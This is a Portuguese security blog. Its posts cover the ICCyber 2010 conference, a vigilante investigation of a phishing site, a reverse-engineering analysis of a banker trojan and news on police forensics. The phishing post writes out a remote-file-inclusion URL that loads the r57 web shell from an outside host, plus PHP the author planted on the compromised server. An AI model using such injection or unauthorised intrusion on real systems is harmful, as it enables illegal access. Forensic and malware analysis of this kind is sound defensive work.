Combate aos Crimes Cibernéticos e a ICCyber 2010

Visão geral do combate aos crimes cibernéticos no Brasil e no mundo

Nos dias 15 a 17 de setembro agora, tive a oportunidade de participar da ICCyber 2010, VII Conferência Internacional de Perícias em Crimes Cibernéticos, promovida pela ABEAT, Associação Brasileira de Especialistas em Alta Tecnologia, com apoio e colaboração técnica da Polícia Federal brasileira e da Federal Bureau of Investigation – FBI/EUA.

O evento foi muito proveitoso, tive a oportunidade de assistir 17 palestras, conversar com peritos e profissionais da área. Foi possível me atualizar com que há de mais moderno no Brasil e no mundo. Algo que notei foi que muitos órgãos de países diferentes, por exemplo PF e FBI, possuem os mesmos desafios e problemas.

Na palestra do Special Agent Gerald Reichard da CyberCrime Division do FBI, uma frase me chamou a atenção:

“O FBI não têm mais tempo para sentar em frente a um computador e caçar hackers”.

Logo pensei: “ué, se nem o FBI faz esse tipo de serviço quem irá fazer então?”.

Então o agente especial já em seguida explicou que para esse tipo de serviço eles têm parceiros que colaboram, profissionais especializados de empresas de antivírus, empresas de segurança, empresas de TI em geral. As empresas de antivírus são grandes parceiras e sempre que encontram algo que pode ser mais grave já reportam a eles, porém, logicamente que eles se envolvem somente com casos grandes, ele mesmo citou um exemplo, um furto de 500,00 dólares de uma conta eles nem perdem tempo em investigar, já o furto de 500,00 dólares em centenas de contas de vários lugares diferentes aí sim eles entram em ação.

Uma outra grande parceira do governo dos EUA, talvez a maior, e que eu nem imaginava que fosse, é a Microsoft, isso mesmo, quem diria a tão criticada Microsoft.

Na palestra sobre CyberDefense de Tim Boechl, manager da Microsoft, ele citou algumas informações intrigantes. Dos 5 maiores clientes da Microsoft, 4 são militares. A empresa possui parceria com dezenas de governos ao redor do mundo, mas principalmente o dos EUA. Ela possui um tipo de parceria que fornece o código-fonte de seus produtos para o governo auditar em busca de algum código que possa ser malicioso para a rede governamental.

Inclusive em um caso exposto pelos agentes do FBI que envolvia envio de cerca de 1,2 bilhão de SPAMs por semana para manipular o mercado de ações, foi a Microsoft que alertou e colaborou diretamente com as investigações para chegar nos criminosos, além de várias outras empresas.

Será que esse tipo de parceria ocorre apenas nos EUA?

Não, ocorre aqui também no Brasil. Perguntei para um perito se a Polícia Federal fazia alguma investigação proativa, ou seja, antes do crime ocorrer. Ele disse que não, só investigam após o crime ter sido cometido, por exemplo, só vão atrás de uma fraude bancária depois que o cara vai lá no caixa eletrônico e retira o dinheiro. Ele até citou que esse patrulhamento proativo (mesmo que cibernético) seria função de forças militares. Ele disse ainda que as vezes quem faz esse tipo de investigação são as empresas de antivírus aqui do Brasil também, e tem também a FEBRABAN, Federação Brasileira de Bancos, que realiza esse tipo de serviço e enviam pra eles.

Resumindo

Ouvi a palavra “PARCERIA” dezenas de vezes, a parceria com empresas de antivírus, de TI, profissionais especializados, é fundamental para que as forças da Lei tanto nacionais quanto internacionais consigam combater esse tipo de crime. Outra coisa que ficou bem clara, essas mesmas forças ainda não possuem estrutura adequada, pessoal e nem tempo para realizar essas investigações cibernéticas antes que o crime ocorra, por exemplo a investigação que fiz no post anterior “Hackeando o Hacker”. Praticamente ninguém faz esse tipo de trabalho, e isso contribui para que esse tipo de crime aumente já que o cerco a eles ainda não é muito fechado.

Fatos sobre o cenário atual dos crimes e da guerra cibernética

Cada vez mais notícias estão surgindo sobre a guerra cibernética. Primeiro foram os chineses espionando os EUA, depois os EUA espionando os chineses. Agora o malware Stuxnet que especialistas dizem ter sido criado por algum governo e que tem como alvo instalações essenciais do Irã. Inúmeros exércitos estão criando unidades de combate cibernéticas, inclusive o brasileiro.

Já é uma realidade a importância que a rede mundial tem em combates entre nações. Na palestra do gerente da Microsoft na ICCyber, ele citou um conflito que a arma principal do exército não foi tanque de guerra, bomba, avião e sim ataques pela Internet para desativar toda a rede do país.

Isso aconteceu no conflito entre a Rússia e a Georgia em 2008. A principal arma da Rússia nesse conflito foi a cibernética, eles praticamente varreram a Georgia da Internet, atacaram e tiraram do ar todos os sites e sistemas governamentais e essenciais para o país. Imagine o impacto disso? Caso o país fique sem sistema de comunicação o caos que poderá ocorrer. Não é mais ficção é realidade, apesar de lembrar o filme Duro de Matar 4.0.

E o nosso papel nisso tudo?

Tive a ideia de escrever esse post após o comentário do colega “Anonimo” no meu post anterior. Uma das coisas que ele disse é que existem poucos whitehats (hackers éticos) que fazem esse trabalho de combate aos crimes cibernéticos. E realmente é verdade, como podemos ver nem mesmo nas forças da Lei existem muitos profissionais que fazem isso.

A carência é enorme e o volume de trabalho é gigantesco. Os blackhats, crackers, criminosos, são sempre muito audaciosos e ousados, estão sempre se achando “os espertos” enganando os usuários com seus phishings e todos os tipos de artimanhas possíveis. E onde estão os profissionais éticos, que com certeza possuem muitos mais conhecimentos do que esses criminosos, para provar o contrário?

As vezes muitos pensam que possuir conhecimentos que possam ser usados para o “lado negro da força” é errado, ou acham que com esse tipo de conhecimento só dá para realizar atos criminosos. Isso é errado. Engenharia reversa pode ser usada tanto para crackear programas como também para dissecar malwares em busca dos autores. Conhecimento em invasão de computadores, sistemas ou sites pode ser usado para entrar em um sistema criminoso e contra-atacar, a PF fez isso na Operação Hércules. Pode também ser utilizado para realizar pen-tests para descobrir possíveis falhas de segurança, os governos fazem bastante isso.

Quando pensei em escrever esse blog meu intuito era de mostrar que esses conhecimentos podem ser usados para o “lado bom da força” e para compartilhar ideias com outras pessoas que possuem os mesmos interesses.

Já que os crackers e defacers formam equipes para cometer crimes, quem sabe um dia não poderíamos criar também uma equipe independente de whitehats para combater esses crimes e até ajudar as forças policiais? Tenho certeza, por experiência própria, que nossa ajuda seria muito bem-vinda por eles.

O que ganharíamos com isso? Aí depende de cada um, da vocação, do prazer em fazer o que gosta, de poder ajudar para um internet mais segura, de ser reconhecido como um profissional especialista nisso, da possibilidade de adquirir conhecimentos novos e até estar se preparando para quem sabe passar no concurso de perito da PF.

Agradeço a paciência de quem leu até aqui, ficam aí minhas ideias para serem analisadas, comentários serão muito bem-vindos. Abaixo locais onde os crimes cibernéticos podem ser denunciados.

Abraços!

Onde denunciar crimes cibernéticos

Polícia Federal

Para denunciar crimes contra os direitos humanos na internet: pornografia infantil, crimes de ódio, genocídio e tráfico de pessoas acesse o site:
http://denuncia.pf.gov.br/

SaferNet

Crimes contra os direitos humanos na internet: pornografia infantil, racismo, apologia e incitação a crimes contra a vida, xenofobia, neo nazismo, maus tratos contra animais, intolerância religiosa, homofobia e tráfico de pessoas:
http://www.safernet.org.br/site/denunciar

Blog do Delegado Emerson Wendt

Especialista em crimes virtuais da Polícia Civil do RS

Crimes variados na Internet como fraudes financeiras, invasões, defaces, etc. Recomendo esses dois posts dele:

Crimes virtuais: como proceder??

http://www.emersonwendt.com.br/2009/12/crimes-virtuais-como-proceder.html

Lista dos Estados que possuem Delegacias de Polícia de combate aos Crimes Cibernéticos

http://www.emersonwendt.com.br/2010/07/lista-dos-estados-com-possuem.html

Hackeando o Hacker – Investigando e contra-atacando um phishing

Primeiramente uma explicação sobre o título do artigo. O verbo “hackear” não existe oficialmente e o termo “hacker” aqui empregado não é o mais correto de ser utilizado, para mim hacker é quem possui conhecimentos avançados em computação e telecomunicações e utiliza esses conhecimentos em seu trabalho honesto para resolver problemas. Já no caso do artigo o termo mais correto seria “cracker” ou ainda fraudador, criminoso, bandido, estelionatário, etc. Enfim, utilizei esses termos por serem mais populares e causarem mais impacto.

Dito isso, vamos ao artigo em si.

Recebi um email cujo remetente se denominava “Banco do Brasil.” e o assunto “Informativo ao

Clientes Banco do Brasil!”. No corpo do e-mail havia um link chamado “[Recadastrando Cliente – BB]” que apontava para o endereço:

http://xxxxxx.ru/tpl/bancodobrasil.php#www.bancodobrasil.com.br/recadsatramento/cliente

Esse por sua vez redirecionou para outro site:

http://www.SITEORIGINAL.com.tw/admin/central/Auto-Atendimento/BancodoBrasil/

Estava aí mais um caso do nosso já conhecido phishing scam.

O site que abriu era uma cópia do site original do Banco do Brasil. Uma das diferenças do original é que o falso solicitava várias senhas diferentes, conforme pode ser visto na figura abaixo

Para obter mais informações sobre a fraude e uma possível identificação do autor, fiz uma pesquisa no site para tentar descobrir como o fraudador conseguiu obter o acesso não autorizado aos arquivos do mesmo.

Constatei que o site foi construído utilizando a linguagem de programação PHP. Uma técnica de invasão muito comum nesse tipo de site é a chamada “PHP Injection” (também conhecida como RFI - Remote File Include). Trata-se de uma técnica que permite executar arquivos remotamente no site inserindo na URL do mesmo uma outra URL contendo um script que permite executar comandos dentro das pastas do próprio site.

Para descobrir se o fraudador utilizou essa técnica, digitei a seguinte URL para ser executada no navegador:

http://www.SITEORIGINAL.com.tw/index.php?pg=http://LOCALDOSCRIPT/r57.txt?&cmd=ls

Através dessa URL é solicitado ao site original executar um arquivo que está em outro site. O arquivo “r57.txt” é um script que possui uma série de comandos para manipular pastas e arquivos do servidor onde está hospedado o site original, no exemplo em questão foi solicitado executar o comando “ls” (r57.txt?&cmd=ls) que lista todos os arquivos e pastas. Esse procedimento só funciona se o site alvo possuir uma falha de segurança específica da linguagem de programação PHP.

Após a execução dessa URL obtive êxito e consegui listar todos os arquivos e pastas do site original, ver imagem abaixo.

Na listagem foi possível descobrir a provável data que o site foi invadido. A data de modificação da pasta “admin” que foi onde o fraudador copiou o falso site era de 22 de julho, às 14:19 conforme a linha abaixo:

57491894 drwxr-xr-x 4 citycrea citycrea 4096 Jul 22 14:19 admin

Através do script “r57.txt” acessei as pastas “admin”, “central” e finalmente a “BancodoBrasil”.

Realizei uma cópia de todos os arquivos do site falso para análise.

Lendo os códigos-fontes dos arquivos copiados descobri que o arquivo “adesao.php” era o responsável por coletar todos os dados digitados pelas vítimas e salvá-los em um arquivo do tipo TXT chamado “PPx.txt”. Ao abrir o arquivo “PPx.txt” constatei que realmente já havia vários dados de agências, contas e senhas capturadas de possíveis vítimas.

Ainda analisando os demais arquivos, encontrei o arquivo “bt0165.php” que tinha como título “By Scra3zy > AoD > CMD > File List”. Tratava-se de um script shell para manipular arquivos e pastas no servidor invadido, parecido com o “r57.txt” que eu estava utilizando. O fraudador o utilizava para manipular os arquivos do seu falso site.

Sabendo disso e visando obter mais meios que pudessem identificar o autor da fraude, pensei em uma maneira de descobrir o endereço IP da conexão de Internet de onde o fraudador gerenciava todo esse sistema.

Como já mencionado, ele utilizava o arquivo “bt0165.php” para manipular os arquivos do falso site e tendo conhecimento que esse sistema utilizava a linguagem PHP, resolvi adicionar ao código-fonte do “bt0165.php” algumas linhas de código que realizariam a função de: toda vez que o sistema fosse acessado, registrar o dia e hora atual do servidor (com fuso horário GMT) e o endereço IP de onde partiu a conexão e salvar em um arquivo do tipo TXT no próprio site, só que em outra pasta e nome que não revelasse a verdadeira intenção do arquivo, para que assim o fraudador não pudesse encontrar facilmente.

Isso foi possível utilizando o script “r57.txt” para editar e inserir o seguinte código ao arquivo “bt0165.php” utilizado pelo fraudador:

$nowt = date('r');

$errors_file = "../error.txt";

$errors_handler = fopen($errors_file, 'a');

$errors_data = $nowt." - ".$_SERVER['REMOTE_ADDR']."\n";

fwrite($errors_handler, $errors_data);

fclose($errors_handler);

Com isso, se o fraudador acessasse o “bt0165.php” para manipular os arquivos do site, automaticamente iria ficar registrada a data e hora (com fuso horário GMT) do acesso e o endereço IP de onde partiu a conexão. E ficaria salvo no arquivo “.../admin/central/Auto-Atendimento/error.txt”.

Após algumas horas já foi possível perceber que o sistema deu certo, ao acessar o arquivo “error.txt” através do navegador, havia várias linhas com as conexões do fraudador conforme imagem abaixo.

Após três dias de monitoramento, identifiquei o comportamento do fraudador, que era de acessar várias vezes ao dia o arquivo “PPx.txt” para verificar se havia sido capturada alguma informação de conta bancária e caso positivo ele copiava o arquivo possivelmente para seu computador e depois utilizava o script “bt0165.php” para apagar o “PPx.txt”. Cada acesso ao “bt0165.php” ficou registrado no arquivo “error.txt”.

De posse do IP do “hacker” realizei uma varredura no seu micro, encontrei uma falha de segurança, invadi, obtive acesso root e formatei o HD dele. :) É brincadeira, não fiz isso, ele que é o bandido não eu.

O IP dele era dinâmico, porém de um provedor nacional, o que mostra que dá para chegar até ele através da quebra de sigilo telemático solicitando na justiça os logs de acesso.

Todas as informações encontradas nessa investigação repassei para as autoridades policiais responsáveis pelo combate ao crime cibernético. Lembrando que o método utilizado nesse artigo só é válido mediante prévio mandado judicial autorizando os procedimentos.

É isso aí, até a próxima!

Notícia: Polícia Federal cria ferramentas para combater a pornografia infantil

09/09/2010 - 09:53


Novo software de investigação será apresentado em Conferência Internacional de Perícias em Crimes Cibernéticos, em Brasília

A Polícia Federal (PF) investe em tecnologias inovadoras no combate a pornografia infantil na Internet. Operações como Tapete Persa, Laio, Turko, e Carrossel I e II resultaram na prisão de diversos pedófilos nos últimos três anos. Uma das armas mais recentes nessa luta, o software NuDetective, desenvolvida por dois peritos do Mato Grosso do Sul, consegue identificar a presença de material com pornografia infantil em computador suspeito. A ferramenta será apresentada durante a VII Conferência Internacional de Perícias em Crimes Cibernéticos (ICCyber 2010), que será realizada em Brasília entre os dias 15 e 17 de setembro.

O perito criminal federal e chefe do Serviço de Perícias em Informática da PF, Marcos Vinicius Lima, explica que o combate a pedofilia tem se intensificado com o aumento no número de prisões a cada ano: “somente na ultima ação prendemos mais de 20 suspeitos. Essas ferramentas deram efetividade ao trabalho da polícia”, afirmou.

O NuDetective funciona por meio do reconhecimento automatizado de assinaturas de arquivos digitais. O software faz uma triagem na memória da máquina periciada em busca de conteúdos que indiquem a presença de material pornográfico infantil. Em breve, uma nova versão vai reconhecer os padrões de imagens, tornando a varredura nos sistemas suspeitos ainda mais confiável e precisa.

O perito criminal Marcos Vinicius conta que o NuDedective permitiu maior rapidez na detecção desse tipo de conteúdo, o que trouxe ganhos na hora de prender o suspeito em flagrante. “De acordo com o Estatuto da Criança e do Adolescente (ECA), a posse de material pornográfico infantil é crime. Assim, podemos prender o acusado e dar o flagrante no exato momento que o software encontra o conteúdo pornográfico no computador periciado”, destacou o especialista da PF.

Além do NuDedective, peritos da PF também desenvolveram outras ferramentas para o combate a pedofilia na Internet. Uma delas é o EspiaMule, que consegue pesquisar e coletar informações de usuários do programa de compartilhamento Emule, catalogando endereços e criando um mapa da distribuição de imagens de pornografia infantil. Utilizada na operação Tapete Persa, o EspiaMule será compartilhado com a Interpol, agência de polícia internacional. Outro meio de combate é o software WMM. Ele analisa vestígios de conversas do Messenger (MSN). A ferramenta consegue resgatar as conversas realizadas no programa, ajudando no combate e na elucidação de crimes. O WMM foi disponibilizado pela Polícia Federal brasileira e será utilizado pela Polícia Nacional da Espanha.

É crime: Apresentar, produzir, vender, fornecer, divulgar ou publicar, por qualquer meio de comunicação, inclusive rede mundial de computadores ou internet, fotografias, imagens com pornografia ou cenas de sexo explícito envolvendo crianças e pré-adolescentes.

Com a mudança no artigo 241 do Estatuto da Criança e do Adolescente, a posse de fotografias ou vídeos de pornografia, mesmo que não compartilhe o material, passou a ser crime, passível das mesmas punições aplicadas para quem repassa esse tipo de conteúdo.

Confira um histórico recente de operações contra a pornografia infantil deflagradas pela Polícia Federal nos últimos três anos:

Operação Tapete Persa (2010) - Mais de 20 suspeitos de abuso sexual e pedofilia na internet foram presos durante a operação, deflagrada simultaneamente em 54 cidades de nove estados brasileiros.

Operação Turko (2009) - Realizada no dia 18 de maio de 2009, cerca de 400 policiais cumpriram 92 mandados de busca e apreensão em 20 estados e no Distrito Federal. Dez suspeitos foram presos.

Operação Laio (2009) - Deflagrada no dia 15 de setembro de 2009, a operação resultou na prisão em flagrante de sete pessoas. O alvo da ação foi um grupo que mantinha uma de rede de compartilhamento de fotos, vídeos, entre outros materiais com conteúdo de pedofilia pela internet. A operação aconteceu em São Paulo, Rio, Minas e Ceará, além do Distrito Federal.

Operação Carrossel II (2008) - Realizada no dia 03 de setembro, a Operação Carrossel II convergiu com os trabalhos da Comissão Parlamentar de Inquérito – CPI, instaurada no Senado Federal em março de 2008, para investigar o assunto. A investigação contou com o apoio da Interpol no Brasil. Foram mobilizados 650 policiais, que cumpriram 113 mandados de busca e apreensão em 17 estados e no Distrito Federal. As investigações da operação Carrossel identificaram aproximadamente 200 pedófilos em mais de 70 países.

Operação Carrossel I (2007) - Iniciada no dia 20 de dezembro a operação tinha como objetivo reprimir a prática de pedofilia na rede mundial de computadores. A ação ocorreu simultaneamente em 14 estados e no Distrito Federal e três suspeitos foram presos.

Perfil do Iccyber 2010 - Autoridades brasileiras e internacionais, especialistas, consultores e pesquisadores das áreas de segurança da informação, computação forense e direito eletrônico, se reúnem em Brasília/DF, entre os dias 15 e 17 de setembro, com o objetivo de discutir novas técnicas e ferramentas que auxiliem no combate aos chamados crimes cibernéticos. O encontro se dará na Conferência Internacional de Perícias em Crimes Cibernéticos (ICCyber 2010), que é um dos mais importantes eventos de tecnologia e perícias em informática da América Latina.

O evento é realizado pela Associação Brasileira de Especialistas em Alta Tecnologia (ABEAT), em convênio com a Polícia Federal, por meio do Serviço de Perícias em Informática (SEPINF) do Instituto Nacional de Criminalística (INC). O FBI - Federal Bureau of Investigation (Polícia Federal dos Estados Unidos), é também uma das entidades apoiadoras, fundamentais tanto na formatação do conteúdo como no suporte institucional e no convite para a participação dos demais organismos e polícias internacionais.

Em 2010, o evento pretende reunir, no Centro de Eventos e Convenções Brasil 21, em Brasília, mais de 800 conferencistas de várias partes do Brasil e do exterior. O público da ICCyber é composto por policiais e agentes públicos responsáveis pela persecução dos crimes cibernéticos, bem como por autoridades federais, estaduais e municipais, especialistas e gestores públicos e da iniciativa privada da área de segurança da informação.

Espera-se, nesta sétima edição da Conferência, a participação de mais de 20 países e de diversos núcleos de tecnologia do Brasil e do exterior. A edição 2010 será composta de três eventos principais: VII Conferência Internacional de Perícias em Crimes Cibernéticos (ICCyber 2010); V Conferência Internacional de Ciência da Computação Forense (ICoFCS 2010); III Conferência Internacional de Treinamento e Exposição do Capítulo Brasília da HTCIA (IBTCE 2010).

.[Palestra: “Uso da ferramenta NuDetective no combate à pedofilia” , no dia 17 de setembro (sexta-feira), às 11 horas. O ICCyber 2010, de 15 a 17 de setembro de 2010, no Setor Hoteleiro Sul, Quadra 6, Lote 1, Conjunto A – Centro de Eventos e Convenções Brasil 21 - Brasília/DF
http://www.iccyber.org/].
 
Fonte: http://www.revistafator.com.br/ver_noticia.php?not=130836

Engenharia Reversa do Malware Trojan.Win32.VB.ajfm (Banker)

MD5: D75AD6143BB93DF70DDC68053A50471A

O intuito dessa investigação era encontrar informações que pudessem levar ao autor do malware ou ao criminoso que estava por trás desse golpe.

Recebi por email um SPAM phishing que tentava se passar por um recadastramento de segurança do Banco Banrisul.

Ao posicionar o mouse em cima do link do email foi revelada a verdadeira intenção do golpe, induzir o usuário a instalar um malware, destaque na imagem abaixo.

Fiz o download do arquivo "Send-Error.exe". Para tentar descobrir alguma informação relevante no executável primeiro tentei descobrir se havia sido utilizado algum packer no EXE.

Através dos programas PEiD e EXEinfo PE, descobri que o EXE havia sido compactado com o packer "tElock v0.98".

Sabendo disso fiz uma pesquisa no Google e encontrei o "unpacker". Submeti o "Send-Error.exe" ao unpacker e obtive o malware sem a proteção.

Para verificar se a proteção realmente havia sido retirada, submeti o EXE "unpacked" ao programa RDG Packer Detector e obtive resposta satisfatória: a linguagem que o EXE foi compilado, Visual Basic 6.0.

Agora o caminho estava livre para tentar descobrir a verdadeira intenção da praga e já tinha uma informação muito útil, a linguagem de programação utilizada. Era hora de buscar por strings relevantes dentro do código Assembly.

Com a ajuda do OllyDbg e através da opção "Search for - All referenced strings" obtive uma listagem de todas as strings encontradas no executável. Não eram muitas e o malware também era pequeno, deu pra perceber que se tratava apenas de um "Loader", que é um tipo de malware que tem a função de apenas entrar no computador da vítima e fazer downloads de outros malwares, geralmente os keyloggers bankers.

Como prova disso, localizei três URLs de malwares que seriam baixados pelo "Send-Error.exe".

Fiz o download dos três executáveis, "systen.exe", "systens.exe" e "dwin.exe". Utilizando o mesmo procedimento para identificar o packer do arquivo "systen.exe", descobri que se tratava do "Thinstall 2.4x - 2.5x".

Tentei através do unpacker genérico do PEiD desfazer essa proteção do Thinstall e obtive resultado positivo, através do RDG novamente descobri que se tratava do Visual Basic 6.0.

Analisando as strings do "systen.exe.unpacked" com o OllyDbg não encontrei nada relevante porém notei que muitas pareciam estar com uma espécie de criptografia, pois eram sequências de números e letras possivelmente geradas por algum algoritmo.

Sabendo que se tratava de um malware compilado com Visual Basic, resolvi descompilar o arquivo com o VB Decompiler para tentar descobrir mais informações. Foi possível assim identificar algumas funções e formulários interessantes utilizados pelo malware. De pronto deu para descobrir que se tratava de um banker criado para furtar dados de contas bancárias do Bradesco.

Em uma análise mais detalhada encontrei um padrão que se repetia no código, todas aquelas strings que pareciam estar criptografadas eram sempre passadas como parâmetro para um mesmo procedimento, que se iniciava no Offset 0x00418890. Com certeza deveria ser a função que descriptografava a string.

Ao abrir esse procedimento pelo VB Decompiler, estava clara a função do mesmo que era realizar operações com várias strings, combiná-las entre si e com a string passada por parâmetro e retornar um resultado.

Com a ajuda do nosso amigo OllyDbg daria para tirar a prova, era só colocar um breakpoint nesse offset e ir executando linha a linha o debug do malware para ver qual seria o retorno desse procedimento 0x00418890.

Fiz isso e bingo! Descobri o banco de dados para onde o malware enviava todas as informações furtadas das contas do Bradesco. Estavam disponíveis o host, base, usuário e senha do banco de dados.

Através desse procedimento e com algumas alterações no código Assembly do malware, consegui descriptografar todas as strings, muitas continham instruções SQL de inserção e consulta na base, outras havia URLs do banco para serem comparadas quando a vítima acessasse com seu browser.

Todos os resultados obtidos formam encaminhados aos setores da Justiça especializados em combate aos crimes cibernéticos.

É isso aí, até a próxima!

[POST adicionado em 28/09/2010]

Explicação de como consegui descriptografar as demais strings do malware.

Eu tive sorte em descobrir que a primeira string que o malware descriptografava era a mais importante, a que continha as informações de conexão com o banco de dados. Porém ainda queria saber o que as demais strings escondiam.

Para isso, a forma mais simples que encontrei (talvez a mais tosca e trabalhosa) foi a seguinte:

Eu já tinha localizado a primeira string que o malware descriptografava toda vez que era executado, o trecho de código que fazia isso era esse:

0040928A: mov edx, 00403C00 ; "024860405A445E2753340D62610F7E7C757D721E0..."

0040928F: lea ecx, var_34

00409292: mov var_00000098, esi

00409298: call MSVBVM60.DLL.__vbaStrCopy

0040929E: mov edi, [esi]

004092A0: lea ecx, var_34

004092A3: push ecx

004092A4: call 00418890

* Obs.: uma parte da string cortada para facilitar a leitura.

Nesse trecho podemos ver que o malware move a string localizada no endereço 00403C00 para o registrador EDX e no final chama a função 00418890, que é justamente a que descriptografa a string conforme já foi citado no artigo. A função 00418890 então utiliza o EDX que foi passado como parâmetro para gerar a string descriptografada.

O offset exato onde a função 00418890 exibia a string descriptografada era o 00418A16:

Sabendo disso o que fiz foi localizar em todo o código-fonte do malware as strings que estavam criptografadas, copiei o endereço delas e salvei em um TXT, por exemplo encontrei essas três strings criptografadas:

004093FA: mov edx, 00405B3C ; "00301061505E522042661A1156315E5D10"

00409404: mov edx, 00403E00 ; "00246470796D76157F157F626601"

0040940E: mov edx, 00405A54 ; "004810657D776506166E105D5F20505C594351545E..."

Coloquei um breakpoint no offset 00418A16 que conforme dito era exatamente onde o função exibia a string descriptografada.

Depois no Ollydbg eu voltava ao Offset 0040928A, clicava nele, depois clicava com o botão direito em cima e escolhia a opção “Assemble...” e onde estava:

0040928A: mov edx, 00403C00

Eu substituia por exemplo por:

0040928A: mov edx, 00405B3C

Ou seja, indicava o endereço de outra string criptografada. Clicava no botão “Assemble” e “Close”. E iniciava então o Debug com a tecla F9.

O malware parava exatamente no meu breakpoint exibindo a string descriptografada. Reiniciava o Debug (Ctrl + F2) e repetia esse procedimento para cada string.

Por exemplo essas três strings citadas, descriptografadas são respectivamente:

“ Select * from “

“TBL_AVISOSVB”

“ WHERE ( localizador = '”

Qualquer dúvida sobre o artigo pode comentar que eu estarei à disposição para esclarecer.

Notícia: PF inicia perícia em computador de servidora da Receita

Estado de S. Paulo – Brasil – 03.09.2010

PF inicia perícia em computador de servidora sob suspeita

A Polícia Federal iniciou ontem a perícia no disco rígido do computador usado pela servidora Adeildda Ferreira dos Santos, da Delegacia da Receita Federal de Mauá (SP), suspeita de envolvimento no vazamento dos dados fiscais do vice-presidente do PSDSB, Eduardo Jorge Caldas Pereira e de outros tucanos. A quebra do sigilo do computador foi autorizada pela Justiça.

 

Para facilitar o cruzamento de informações, a PF pediu também a quebra de sigilo telefônico, bancário e fiscal de Adeildda. O objetivo é identificar os intermediários do suposto esquema de compra e venda de dados sigilosos, apontado pela corregedoria da Receita. "O foco está nos vazamentos e, no final da linha, vamos desmascarar os mandantes e suas intenções", disse uma fonte com acesso à investigação.
 

A superintendência da PF em São Paulo recebeu orientação para ouvir a filha de José Serra (PSDB), Verônica Serra, que também teve dados fiscais ilegalmente acessados. A PF vai colher o padrão gráfico da caligrafia de Verônica para fazer a comparação, em exame grafotécnico, com a assinatura da procuração usada pelo contador Antônio Carlos Atella Ferreira para obter os dados dela.
 

Também por orientação de Brasília, onde tramita o inquérito, a superintendência expediu mandado de intimação para tomar o depoimento de Atella o quanto antes. Por ter se utilizado de uma procuração falsa, o contador passou a ser investigado, com Adeildda, como suspeito pelo vazamento de dados fiscais. Ele deve ser indiciado por falsidade ideológica e uso de documento falso. A PF também deve apreender o disco rígido de um computador da delegacia da Receita de Santo André, utilizado para invadir os dados de Verônica.
 

Investigação. 

Embora a Receita investigue apenas crimes comum e administrativo, a Polícia Federal não descartou a hipótese de crime eleitoral, que ganhou força com a descoberta de nome de Verônica entre os alvos de devassa ilegal. Até agora, foram interrogadas 12 pessoas, entre testemunhas e suspeitos de envolvimento no caso. Os dados fiscais de Eduardo Jorge foram parar no núcleo de inteligência da pré-campanha da candidata do PT à Presidência, Dilma Rousseff, que nega responsabilidade no episódio.
 

De acordo com uma fonte da PF com acesso à investigação, será feito o rastreamento dos envolvidos a partir do cruzamento de informações. O foco é investigar todos os aspectos do vazamento: quem encomendou, como foi feito e a quem serviu. Foram detectados pela Receita 140 acessos indevidos no computador de Adeildda, com uso da senha da analista Antônia Aparecida dos Santos Neves, chefe da delegacia de Mauá.

Softwares Mal-intencionados

O mundo dos crimes cibernéticos possui alguns termos técnicos, às vezes utilizados como sinônimos, eis alguns:

• crimeware: termo que ainda não possui uma definição oficial, mas que como o próprio nome sugere é a junção das palavras "crime" e "software", ou seja, são todos os softwares utilizados na prática de crimes, na maioria das vezes através da Internet e com objetivo de ganhos financeiros.

• phishing scam (ou somente phishing): junção das palavras fishing (pescaria) e scam (golpe), onde os criminosos enviam uma “isca”, geralmente um e-mail utilizando o nome de alguma instituição conhecida, para “pescar” senhas bancárias e outros dados pessoais das vítimas.

• ransomware: ransom (resgate) e software, programa que se instala no computador da vítima, geralmente criptografa arquivos pessoais e depois cobra regaste para liberar os arquivos.

• malware: termo genérico que se refere a todos os sofwares que possuem algum código malicioso ou mal-intencionado. 

• banker: é um tipo de malware especializado em fraudes bancárias.

Posteriormente serão analisados em detalhes alguns casos de crimes cibernéticos reais, principalmente os que envolvem fraudes bancárias pela Internet.